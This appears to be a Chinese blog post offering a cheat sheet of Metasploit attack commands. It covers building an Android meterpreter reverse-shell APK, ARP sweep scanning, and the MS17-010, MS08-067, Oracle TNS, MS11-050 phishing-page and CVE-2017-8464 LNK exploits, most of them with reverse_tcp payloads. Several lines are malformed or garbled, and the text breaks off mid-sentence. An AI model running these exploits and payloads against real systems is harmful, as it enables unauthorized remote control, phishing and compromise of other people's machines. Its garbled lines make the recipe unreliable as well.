metasploit所有攻击方式(干货)

metasploit安卓渗透

msfvenom -p android/meterpreter/reverse_tcp LHOST=........ LPORT=4444 R> /sdcard/hack,apk
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.250
set LPORT 12345
exploit
use exploit/windows/fileformat/adobe_cooltype_sing  LHOST  LPORT R> /sdcard/pdf.pdf

利用Metasploit进行局域网活动主机扫描
msf > use auxiliary/scanner/discovery/arp_sweep
msf > show options
msf  auxiliary(arp_sweep) > set RHOSTS 192.168.0.0/24  /*设置目标IP 此处扫描192.168.0网段的所   
msf  auxiliary(arp_sweep) > set THREADS 50   /*设置线程  */
内网扫描存在ms17010漏洞
auxiliary/scanner/smb/smb_ms17_010

缓冲区溢出漏洞win xp sp3
use exploit/windows/smb/ms08_067_netapi 
set payload windows/meterpreter/reverse_tcp

ms12042存在与Windows xp和Windows server 2003的所有32位版本、及Windows 7(由于基于x64的系统)以及Windows server 2008 R2 x64
该漏洞是Windows 内核中的漏洞,可能允许特权提升,Windows用户模式调度程序存在内存破环漏洞.

oracle漏洞cve-2009-1979
search tns_auth
use exploit/windows/oracle/tns_auth_sesskey
set payload windows/meterpreter/reverse_tcp

IE漏洞(MS11-050)在msf工具加载攻击模块和载荷模块,构建钓鱼网页。
search ms11-050
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_tcp
show options
set srvhost 192.168.1.100 设置自己的服务器地址,这里设置本机为服务器
set rhost 192.168.1.10
set lhost 192.168.1.100
set uripath index.html 伪造网页地址

CVE-2017-8464震网三代(远程快捷方式漏洞)
当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
search 2017_8464
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118(你的IP)
exploit
之后会在/root/.msf4/local目录下生成我们的

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值